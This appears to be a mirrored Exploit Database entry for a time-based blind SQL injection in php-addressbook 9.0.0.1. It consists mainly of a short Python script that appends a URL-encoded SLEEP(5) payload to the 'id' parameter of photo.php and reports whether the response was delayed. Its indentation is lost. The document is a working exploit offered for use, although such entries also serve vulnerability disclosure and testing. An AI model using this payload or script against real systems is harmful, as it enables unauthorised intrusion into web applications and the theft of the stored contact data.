addressbook 9.0.0.1 – ‘id’ SQL Injection

• Exploit Database
• 89 阅读

• 作者： David Velazquez
  日期： 2020-05-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48416/

• # Title: addressbook 9.0.0.1 - 'id' SQL Injection 
  # Date: 2020-04-01
  # Author: David Velazquez a.k.a. d4sh&r000
  # vulnerable application:https://sourceforge.net/projects/php-addressbook/files/latest/download
  # vulnerable version: 9.0.0.1
  # Discription: addressbook 9.0.0.1 time-based blind SQL injection 
  # Tested On: Ubuntu Server 20.04 LTS
  # Platform: PHP
  # Type: webapp
  
  # Use:
  # addressbook9-SQLi.py #http://127.0.0.1/photo.php?id=1'
  
  
  #!/usr/bin/env python
  # -*- coding: utf-8 -*-
  
  import sys
  import requests
  
  def isVulnerable(URL):
  """Check if the URL is vulnerable to ime-based blind SQL injection"""
  response = requests.get(URL+'%27%20AND%20(SELECT%207812%20FROM%20(SELECT(SLEEP(5)))MkTv)%20AND%20%27nRZy%27=%27nRZy')
  s=response.elapsed.total_seconds()
  if s>5:#I put a sleep sentence to test the bug
  sys.stdout.write('[+] Aplication is vulnerable!!!\n')
  else:
  sys.stdout.write('[+] Aplication NOT vulnerable\n')
  
  if __name__ == "__main__":
  isVulnerable(sys.argv[1])